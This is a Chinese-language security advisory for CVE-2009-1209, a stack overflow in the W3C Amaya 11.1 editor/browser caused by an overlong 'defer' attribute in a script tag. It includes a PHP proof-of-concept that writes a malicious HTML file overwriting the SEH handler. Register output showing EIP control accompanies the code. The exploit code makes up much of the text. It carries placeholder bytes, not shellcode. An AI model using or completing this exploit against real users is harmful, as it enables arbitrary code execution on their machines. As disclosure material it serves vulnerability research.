BUGTRAQ ID: 34295
CVE(CAN) ID: CVE-2009-1209
Amaya是W3C出品的所见即所得的网页编辑/浏览器。
如果用户受骗使用Amaya打开的网页中script标签设置了超长的defer属性的话,则在解析该网页时就可以触发栈溢出,导致执行任意代码。
W3C Amaya 11.1
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.w3.org/Amaya/” target=“_blank”>http://www.w3.org/Amaya/</a>
<?php
/**//*
Amaya 11.1 W3C\'s editor/browser
Stack Owerflow POC
Discover by Alfons Luja
Thx : OiN
select * from friends --
This stUff overwrite SEH in my box XP home sp 2
To correctly overwrite seh you must upload \"remote_love.html\" to remote server
Amaya allow only printable shellcode in this case
EAX:00000000
ECX:43434343
EDX:7C9037D8
EBX:00000000
ESP:0012DDD0
EBP:0012DDF0
ESI:00000000
EDI:00000000
EIP:43434343
*//**/
$junk = \"\\x41\";
$n_seh = \"\\x42\\x42\\x42\\x42\"; //pointer to next seh
$h_seh = \"\\x43\\x43\\x43\\x43\"; //seh handler
for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.=\"\\x41\"; }
$junk.=$n_seh;
$junk.=$h_seh;
$hello = \"<script defer=\\\"\".$junk.\"\\\">\";
$hnd = fopen(\"remote_love.html\",\"w\");
if($hnd){
fputs($hnd,$hello);
fclose($hnd);
echo\"DONE !!\\n\";
} else {
echo\"Kupa !!\\n\";
}
?>
http://sebug.net/exploit/6085/